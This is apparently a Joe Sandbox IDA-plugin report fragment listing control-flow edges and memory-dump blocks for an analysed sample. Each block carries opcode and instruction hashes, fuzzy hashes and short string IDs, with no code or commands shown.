2413->2416 2426 7ff887d189c8-7ff887d18a38 2415->2426 2427 7ff887d18a42-7ff887d18a53 2415->2427 2416->2415 2426->2427 2430 7ff887d18a5a-7ff887d18a95 2427->2430 2431 7ff887d18a55 2427->2431 2436 7ff887d18b11-7ff887d18b22 2430->2436 2437 7ff887d18a97-7ff887d18ae1 2430->2437 2431->2430 2439 7ff887d18b29-7ff887d18b64 2436->2439 2440 7ff887d18b24 2436->2440 2437->2436 2447 7ff887d18be0-7ff887d18bf1 2439->2447 2448 7ff887d18b66-7ff887d18bad 2439->2448 2440->2439 2449 7ff887d18bf8-7ff887d18c33 2447->2449 2450 7ff887d18bf3 2447->2450 2448->2447 2456 7ff887d18caf-7ff887d18cc0 2449->2456 2457 7ff887d18c35-7ff887d18ca5 2449->2457 2450->2449 2458 7ff887d18cc2 2456->2458 2459 7ff887d18cc7-7ff887d18d08 2456->2459 2457->2456 2458->2459 2464 7ff887d18d0a-7ff887d18d30 2459->2464 2465 7ff887d18d84-7ff887d18d95 2459->2465 2471 7ff887d18d31-7ff887d18d51 2464->2471 2467 7ff887d18d9c-7ff887d18ddd 2465->2467 2468 7ff887d18d97 2465->2468 2475 7ff887d18e59-7ff887d18e6a 2467->2475 2476 7ff887d18ddf-7ff887d18e27 2467->2476 2468->2467 2471->2465 2477 7ff887d18e6c 2475->2477 2478 7ff887d18e71-7ff887d18eb2 2475->2478 2476->2475 2477->2478 2484 7ff887d18f2e-7ff887d18f3f 2478->2484 2485 7ff887d18eb4-7ff887d18efb 2478->2485 2486 7ff887d18f41 2484->2486 2487 7ff887d18f46-7ff887d18f87 2484->2487 2485->2484 2486->2487 2492 7ff887d18f89-7ff887d18fd0 2487->2492 2493 7ff887d19003-7ff887d19014 2487->2493 2492->2493 2495 7ff887d1901b-7ff887d1905c 2493->2495 2496 7ff887d19016 2493->2496 2502 7ff887d190d8-7ff887d190e9 2495->2502 2503 7ff887d1905e-7ff887d190a3 2495->2503 2496->2495 2504 7ff887d190eb 2502->2504 2505 7ff887d190f0-7ff887d19131 2502->2505 2503->2502 2504->2505 2510 7ff887d191ad-7ff887d191be 2505->2510 2511 7ff887d19133-7ff887d191a3 2505->2511 2513 7ff887d191c0 2510->2513 2514 7ff887d191c5-7ff887d19206 2510->2514 2511->2510 2513->2514 2520 7ff887d19208-7ff887d1924f 2514->2520 2521 7ff887d19282-7ff887d19293 2514->2521 2520->2521 2522 7ff887d1929a-7ff887d192de 2521->2522 2523 7ff887d19295 2521->2523 2529 7ff887d1935a-7ff887d1936b 2522->2529 2530 7ff887d192e0-7ff887d19350 2522->2530 2523->2522 2531 7ff887d1936d 2529->2531 2532 7ff887d19372-7ff887d193b6 2529->2532 2530->2529 2531->2532 2537 7ff887d193b8-7ff887d19428 2532->2537 2538 7ff887d19432-7ff887d19443 2532->2538 2537->2538 2540 7ff887d1944a-7ff887d194af 2538->2540 2541 7ff887d19445 2538->2541 2549 7ff887d1952a-7ff887d19539 2540->2549 2550 7ff887d194b1-7ff887d194f8 2540->2550 2541->2540 2555 7ff887d1953b-7ff887d19562 2549->2555 2556 7ff887d19563-7ff887d195c4 2549->2556 2550->2549 2555->2556
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: H
                                                                                                                        • API String ID: 0-2852464175
                                                                                                                        • Opcode ID: 6e000ab01ed8cf09e1192cb673ecb9065c5f95892cb6b25f01342e75d75ebd7f
                                                                                                                        • Instruction ID: 11309558146952ebcd43beca43667533619b95b49ad27d4fec0a48dbda98629b
                                                                                                                        • Opcode Fuzzy Hash: 6e000ab01ed8cf09e1192cb673ecb9065c5f95892cb6b25f01342e75d75ebd7f
                                                                                                                        • Instruction Fuzzy Hash: A4D29574A08A4E8FDB85EF58C485BEDB7F1FF69340F1442A9D41AC728ACA34E846C751
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: b4B
                                                                                                                        • API String ID: 0-3849415641
                                                                                                                        • Opcode ID: 375efc3b2766d2636ff7fa51f4cc12d08b2c0a83ca332b02a734dd52bbc48592
                                                                                                                        • Instruction ID: e53984099aad6944458c7054faaf0da453b0ccbf861072f77b57fb3069eb0a0a
                                                                                                                        • Opcode Fuzzy Hash: 375efc3b2766d2636ff7fa51f4cc12d08b2c0a83ca332b02a734dd52bbc48592
                                                                                                                        • Instruction Fuzzy Hash: 8A12213290DA854FE729DB28C8415B9B7F0FF95344B1446BED08FC769ADE29B842C781
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 447a1867b83b9d8adab70cb35cee7b605ae703c427c19a6f0c2398ef9c2a80e5
                                                                                                                        • Instruction ID: a57ff1ac0ad8f5a12b0ffee8c35ab72f25ffcee2571180b7ef60637565f2af7b
                                                                                                                        • Opcode Fuzzy Hash: 447a1867b83b9d8adab70cb35cee7b605ae703c427c19a6f0c2398ef9c2a80e5
                                                                                                                        • Instruction Fuzzy Hash: 7EE23270608A8A8FEB85EF58C459BFD77E1FF58340F1805B9D85EC7296DA38A841CB11
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: `
                                                                                                                        • API String ID: 0-2679148245
                                                                                                                        • Opcode ID: 67f041ff37819166c71402fc9c0645013f2b76fb7eb643f893b726afb6fffa10
                                                                                                                        • Instruction ID: a5f88e8397b5dddb9113bfadb8fb6ad9ce78c40c763dea16413fa6c341b2629f
                                                                                                                        • Opcode Fuzzy Hash: 67f041ff37819166c71402fc9c0645013f2b76fb7eb643f893b726afb6fffa10
                                                                                                                        • Instruction Fuzzy Hash: 69F10651D4EAC61FE396A67854182BDEFE0FF562A0B1845FED04BCB1EBDD182805C321
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8ML
                                                                                                                        • API String ID: 0-1551480261
                                                                                                                        • Opcode ID: 72b2b48f4e357fd5d78c522120f51ffc5ae305e163d0497a1ede2362cd77181b
                                                                                                                        • Instruction ID: 340cc5dbf601eb521eb19c3ab1291da000e3e37427c96b89613b46d06709c071
                                                                                                                        • Opcode Fuzzy Hash: 72b2b48f4e357fd5d78c522120f51ffc5ae305e163d0497a1ede2362cd77181b
                                                                                                                        • Instruction Fuzzy Hash: 48D18170A69A4A8FDB98DF68C455ABD77E1FF58350F1042BDD00BC7299DE38A842CB40
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: /B
                                                                                                                        • API String ID: 0-1225004542
                                                                                                                        • Opcode ID: 0fabfe9307f85cc013a0471257685bcc2b9ccd92b9a64e24e3eed537d1dc2a58
                                                                                                                        • Instruction ID: 0735a1553843af17a3def7c488d0202f22701313a1f5eae52b9e027d7b67811a
                                                                                                                        • Opcode Fuzzy Hash: 0fabfe9307f85cc013a0471257685bcc2b9ccd92b9a64e24e3eed537d1dc2a58
                                                                                                                        • Instruction Fuzzy Hash: 9DB15F70A5894D9FEFD4EF2CD898AAD77F1FF69340B0402A5E44ED7266CA24E841CB40
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: r6B
                                                                                                                        • API String ID: 0-2624010786
                                                                                                                        • Opcode ID: 4498225fba4b4d0e60a59b58d050cf6eea5b980ff3f610fb5c850882e4f210a8
                                                                                                                        • Instruction ID: 9c62770d284d109df8729537a1dce61c6367263fcc35337760b55773c6e12b6d
                                                                                                                        • Opcode Fuzzy Hash: 4498225fba4b4d0e60a59b58d050cf6eea5b980ff3f610fb5c850882e4f210a8
                                                                                                                        • Instruction Fuzzy Hash: B7712532A1CB484FD758DA5C98456BEB7F1FB99360F00427FE04ED3286DE35A8468782
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8ML
                                                                                                                        • API String ID: 0-1551480261
                                                                                                                        • Opcode ID: ea135bb1182b26f176b66f2ddbcc73452270615cba2ba9d08e2747726799e900
                                                                                                                        • Instruction ID: 1943825fc47e56a1f69d79009191984aaaf566cd16fb1d13f9bbd3dd4cdff8bd
                                                                                                                        • Opcode Fuzzy Hash: ea135bb1182b26f176b66f2ddbcc73452270615cba2ba9d08e2747726799e900
                                                                                                                        • Instruction Fuzzy Hash: 22917674A1894E8FDB88EF18C494BA9B7F1FF58340B144669D41EC729ADA35EC42CB50
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: b4B
                                                                                                                        • API String ID: 0-3849415641
                                                                                                                        • Opcode ID: 68b3426f165d8c681b8542bef91beeed2786411cdd0e944865ca95440817f4a2
                                                                                                                        • Instruction ID: d36fbfdb828c7e4074d5522013d7d18b20450aba2f3c6a61c51fa863c053690c
                                                                                                                        • Opcode Fuzzy Hash: 68b3426f165d8c681b8542bef91beeed2786411cdd0e944865ca95440817f4a2
                                                                                                                        • Instruction Fuzzy Hash: 14812430A5CA464FE358DA28E8855B5B7E2FF8535071486BDC48BC765BEE28BC43C790
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0N_^
                                                                                                                        • API String ID: 0-446413343
                                                                                                                        • Opcode ID: beeee31647c6093e67bd20ef0af8bf12bf4724afd418479e5098209df52f52a2
                                                                                                                        • Instruction ID: f5cf8baeee182950100065b60903ab5b12e70194f8fc21c70defff8b77bd789e
                                                                                                                        • Opcode Fuzzy Hash: beeee31647c6093e67bd20ef0af8bf12bf4724afd418479e5098209df52f52a2
                                                                                                                        • Instruction Fuzzy Hash: DB914671D5CA8A8FE795DB2884552FD7BF1FF56350F0842BAC04ACB197DA296803C341
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "M_L
                                                                                                                        • API String ID: 0-292874778
                                                                                                                        • Opcode ID: b45419d53e0b4db1c32e86bbdc7512c5d5a79a3b80ef1aa084f412b0e1752fca
                                                                                                                        • Instruction ID: 4cf1032fbfedb02fe07fccc106ea54751835a09fed2cbeee783bb8cda140178d
                                                                                                                        • Opcode Fuzzy Hash: b45419d53e0b4db1c32e86bbdc7512c5d5a79a3b80ef1aa084f412b0e1752fca
                                                                                                                        • Instruction Fuzzy Hash: 5D618A31A5CA8A0FE758EA5894469BA77E1FF56350B00427ED45BC319BEE1CB807C391
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: PN_^
                                                                                                                        • API String ID: 0-566054172
                                                                                                                        • Opcode ID: 9ac4779a108cd78c6ab6a9a899cfcc461c6c38565f52925f782cb48a330a33eb
                                                                                                                        • Instruction ID: 1da2695c3a796a374d3448915d1ca9db8cd1152c2e6bfd9c9849b876d7decdfb
                                                                                                                        • Opcode Fuzzy Hash: 9ac4779a108cd78c6ab6a9a899cfcc461c6c38565f52925f782cb48a330a33eb
                                                                                                                        • Instruction Fuzzy Hash: 12610C3294D6990EE752A77498155EDBBB1FF823A1F0403BBD059CB0D7DD19640AC3A2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: b4B
                                                                                                                        • API String ID: 0-3849415641
                                                                                                                        • Opcode ID: 5498e7bd9dd3d4b7a15307f242eda8f29abdff0db5d44a404495936c719e38b1
                                                                                                                        • Instruction ID: e95effe49e49dad2fe41936fb73ca3d6d8b4ffa64e435d5395a7039368503b72
                                                                                                                        • Opcode Fuzzy Hash: 5498e7bd9dd3d4b7a15307f242eda8f29abdff0db5d44a404495936c719e38b1
                                                                                                                        • Instruction Fuzzy Hash: B551F330A18A464FE319EB28D8856B5B7E1EF45350B0485BDD48FC7697EE28BC43C750
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8ML
                                                                                                                        • API String ID: 0-1551480261
                                                                                                                        • Opcode ID: 4bd9b4ad909858b54740875438dc2477731c6aa4760b91c3dcfb28f73fa8022b
                                                                                                                        • Instruction ID: aa04cb9d0e3101076295a72be87abb96b9b0a177ff7039db422bc19b6c04390b
                                                                                                                        • Opcode Fuzzy Hash: 4bd9b4ad909858b54740875438dc2477731c6aa4760b91c3dcfb28f73fa8022b
                                                                                                                        • Instruction Fuzzy Hash: 22512A70A58A0E8FDB88EF58C4957AE73F1FF58350F500669E41EC7299CA34E852CB50
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8ML
                                                                                                                        • API String ID: 0-1551480261
                                                                                                                        • Opcode ID: 6810ca1ef6f1a305b5d0cb45f1423bd952a11687e1d66e142695ab9e596b42a5
                                                                                                                        • Instruction ID: 0dc843704a8937bc3163b19938b4f21ac0edcdfe67df769e73605c99e3ae0a40
                                                                                                                        • Opcode Fuzzy Hash: 6810ca1ef6f1a305b5d0cb45f1423bd952a11687e1d66e142695ab9e596b42a5
                                                                                                                        • Instruction Fuzzy Hash: D4513230A5894A8FDB98DE08D454BAE77F2FF98351F1446A9D41FC7299CE38E842CB40
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: L
                                                                                                                        • API String ID: 0-2896118805
                                                                                                                        • Opcode ID: 3ca76b72a0b4dc163151be9a87d47e0159af4705d088de9a7803083131f6cca0
                                                                                                                        • Instruction ID: fdc10c1d2358413726fca844dd0caa3006d6611304128ee5afa50d3ddb65f7ba
                                                                                                                        • Opcode Fuzzy Hash: 3ca76b72a0b4dc163151be9a87d47e0159af4705d088de9a7803083131f6cca0
                                                                                                                        • Instruction Fuzzy Hash: BB410531A0CA4E4FE750DE6898146AEB7B1FF99390F04067AD44EC7296DB386802C791
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: #P
                                                                                                                        • API String ID: 0-838054409
                                                                                                                        • Opcode ID: b6af6494fd19dee7e96d58535aa2dcb38475dcdc030726454038415a55e01b57
                                                                                                                        • Instruction ID: 1ee4627261c819d58a7c875e2f976ecf32803ca1db58c568cbf53c699d3dcf24
                                                                                                                        • Opcode Fuzzy Hash: b6af6494fd19dee7e96d58535aa2dcb38475dcdc030726454038415a55e01b57
                                                                                                                        • Instruction Fuzzy Hash: FB31D471A1C9495FDB4CAA1CE846AFD37D0EBA6360F00403FF45F83587DE29B8468296
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: b4B
                                                                                                                        • API String ID: 0-3849415641
                                                                                                                        • Opcode ID: 876bcef566b78a8595f7539572fe82a59c72c56795b4bdce3901df6f22dd427f
                                                                                                                        • Instruction ID: 125d587ea14912f3da5fc507367e4d36b9c3a69cb9edc19625071b8a81780315
                                                                                                                        • Opcode Fuzzy Hash: 876bcef566b78a8595f7539572fe82a59c72c56795b4bdce3901df6f22dd427f
                                                                                                                        • Instruction Fuzzy Hash: 44212B61D5CE8A5FE796AA3888156BD7BE0FF15380F0406FAE00AC71DADD1C3845C792
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: _N_L
                                                                                                                        • API String ID: 0-2322017282
                                                                                                                        • Opcode ID: 4bd5c8f016f93cc84b926587d895fd2b395593559c837ca68acf98d7599f890d
                                                                                                                        • Instruction ID: 95120312844c75696b2bb4a18c3213ae161e6468eb571f100fada711b42c7ede
                                                                                                                        • Opcode Fuzzy Hash: 4bd5c8f016f93cc84b926587d895fd2b395593559c837ca68acf98d7599f890d
                                                                                                                        • Instruction Fuzzy Hash: 4521D331918A4A4FEB59EA18D4516B9B3E2FF59780B10467DC41FC328ACE38F842C750
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: r6B
                                                                                                                        • API String ID: 0-2624010786
                                                                                                                        • Opcode ID: 655d4e8133e18946c99f9d806609db4a4fc076d051b09e3c8812830a147934ff
                                                                                                                        • Instruction ID: 536bd4cd500edecec25eaa5049eecd2356dc72c41d3ccdf15c05473447dd3111
                                                                                                                        • Opcode Fuzzy Hash: 655d4e8133e18946c99f9d806609db4a4fc076d051b09e3c8812830a147934ff
                                                                                                                        • Instruction Fuzzy Hash: 96110A71B5CB494B9798DD2C585153EB7D1FBA8255F04033FE84FC3245DE25D8018782
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: b4B
                                                                                                                        • API String ID: 0-3849415641
                                                                                                                        • Opcode ID: 574a89a7b00115e5f3c7947154e0dcd52215a74872a52e160f0c809090ea5d9a
                                                                                                                        • Instruction ID: a71ff0450e027e5a48a98d405120aa712a08e915f890421cd67788b240a81b29
                                                                                                                        • Opcode Fuzzy Hash: 574a89a7b00115e5f3c7947154e0dcd52215a74872a52e160f0c809090ea5d9a
                                                                                                                        • Instruction Fuzzy Hash: 5911D531A58D064FD798DA6CD44927AB3E1FF94350B5447BDD04FC7289DA28E842D781
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8!G
                                                                                                                        • API String ID: 0-3619334280
                                                                                                                        • Opcode ID: 6f3edeb12c080984fd61ad1bce8dfe17c9008b4b7827089e9e8c898a597016c0
                                                                                                                        • Instruction ID: 3d131124c833f7f983b0940688d2c6a64a8d2a30a51171b029998d6475465cb1
                                                                                                                        • Opcode Fuzzy Hash: 6f3edeb12c080984fd61ad1bce8dfe17c9008b4b7827089e9e8c898a597016c0
                                                                                                                        • Instruction Fuzzy Hash: 5411A921E5890A8FEB98F7BC94197B9B2E2FF95740F044179E00FC3196DD1CAC058752
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8eL
                                                                                                                        • API String ID: 0-2915619072
                                                                                                                        • Opcode ID: 878c754e30c14a442cf44321011099f8b52e1dbf0f4a54efe0f182678d33248f
                                                                                                                        • Instruction ID: 68a3eb6f12ae773cad98254ef82d19a365553ed6f3f3b15a2d4f9b9b6b7a6250
                                                                                                                        • Opcode Fuzzy Hash: 878c754e30c14a442cf44321011099f8b52e1dbf0f4a54efe0f182678d33248f
                                                                                                                        • Instruction Fuzzy Hash: 51110452D5E7821FE3525238986517DAFB0EF1A290F0907FFD08EC71D7E80C988A8362
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: zJ_H
                                                                                                                        • API String ID: 0-502210507
                                                                                                                        • Opcode ID: 8dfa84800afaa0b136e03f775ad947b0c7b489973d371946128edea4206e8bde
                                                                                                                        • Instruction ID: 77a007ce67c7e12d488b282695be039684afd5e8ae0c3e13c6db69ea5829683b
                                                                                                                        • Opcode Fuzzy Hash: 8dfa84800afaa0b136e03f775ad947b0c7b489973d371946128edea4206e8bde
                                                                                                                        • Instruction Fuzzy Hash: 86F02B11E58A5B07F7A4561C34049F823D1E7002D0F4801B3E80ECB3DCE90D8DC381D6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 3
                                                                                                                        • API String ID: 0-4035909810
                                                                                                                        • Opcode ID: 9a3648963ee60335db87ddafb0dcb063b1f6f0b660deb65ce1a780f4bf0da222
                                                                                                                        • Instruction ID: d3228283d09b301c33bd943b4096995a36de6dae8645e13ab3a0e5071b48006d
                                                                                                                        • Opcode Fuzzy Hash: 9a3648963ee60335db87ddafb0dcb063b1f6f0b660deb65ce1a780f4bf0da222
                                                                                                                        • Instruction Fuzzy Hash: B901DF3150CB895FC785D728D4605AABBE1FF89360F48067EF08AD62A6CA259941C782
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 3
                                                                                                                        • API String ID: 0-4035909810
                                                                                                                        • Opcode ID: 1a02eabe3eaa7f77c51d67666a8a7dd840615ea326e95459d03ca0b112f759d2
                                                                                                                        • Instruction ID: 66eba3e2c46c23ed4ecbb02dc39c0611bd16daff1a98063d830e804d0ec08965
                                                                                                                        • Opcode Fuzzy Hash: 1a02eabe3eaa7f77c51d67666a8a7dd840615ea326e95459d03ca0b112f759d2
                                                                                                                        • Instruction Fuzzy Hash: 30F0813151CB9D5BD688E608D4505ABB7F1FFC8390F444A3EF04AD3354CE219940C782
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1946598395.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff887d10000_https___files.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 435f029a16aa50ed2c4c4c09307ba49c1d5d664a551063a332d46729ff5901a0
                                                                                                                        • Instruction ID: 1b1522a9396cab9006931b404deca32714f36118e24907bac0e0eb9a63d47a98
                                                                                                                        • Opcode Fuzzy Hash: 435f029a16aa50ed2c4c4c09307ba49c1d5d664a551063a332d46729ff5901a0
                                                                                                                        • Instruction Fuzzy Hash: C622183194CB854FEB46DB2888515697BF1FF56340B1942FAD08AC71E7DE28BC06C792
                                                                                                                        Memory Dump Source
